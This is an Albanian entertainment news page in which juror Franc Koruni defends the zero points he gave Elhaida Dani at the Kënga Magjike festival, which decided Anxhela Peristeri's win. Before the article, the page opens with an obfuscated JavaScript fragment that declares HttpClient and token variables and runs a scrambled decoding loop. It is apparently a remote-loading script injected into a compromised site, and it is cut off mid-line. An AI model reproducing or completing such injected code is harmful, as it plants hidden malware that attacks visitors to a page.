;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Flet artisti që ia mori fitoren nga duart Elhaida Danit: A është penduar?!

By

Anxhela Peristeri triumfoi mbrëmë në festivalin ‘Kënga Magjike’ në një rast të paprecedentë ku fituesi u përcaktua nga votimi i artistit të fundit.

Franc Koruni i dha zero pikë Elhaida Danit e cila printe deri në fund, për të determinuar fituesen, Anxhela Peristerin me ‘E çmendur’.

E ishte ky votim që u komentua shumë nëpër portale por pa prononcimin e protagonistit.

E për të herën parë, Franc Koruni foli në një lidhje telefonike në studion ku ishte prezente edhe Elhaida Dani tek ‘E diela shqiptare’.

Koruni nuk u shpreh me pendesë duke thënë se vlerësimin e kishte objektiv dhe të bazuar në shënime për secilën përformancë.

‘Prisnin të gjithë të thoja Elhaida dhe unë thash Kastro. Mendoja vërtetë që Kastro e meritonte cmimin e parë. Doja të thoja dicka, votimi bëhet dhe gjithë këngëtarët votojnë në një mënyrë ose tjetër. Realisht unë kam mbajtur shënime nga fillimi deri në fund të spektaklit dhe komentet i kam bërë bashkë.

Në fund më tepruan disa pikë për alternativa tjera. E para, nuk më vret ndërgjegja, unë kam votuar me kokën time dhe nuk njoh asnjë nga këngëtarët. Më erdhi keq për pesë pikët e fundit se Elhaida Dani më shpëtoi por gjithsesi bazuar në dëgjimin, unë Elhaidës nuk i jepja dot më shumë se 5-6 pikë dhe pastaj mora vesh që duheshin 11 pikë prandaj sërish nuk do  çontë peshë. Unë votova këngën dhe jo njerëzit. Doja ta sqaroja këtë pjesë për faktin se u fol shumë.’ – tha mes tjerash Franc Koruni. /Prive.al/

Artikuj të ngjashëm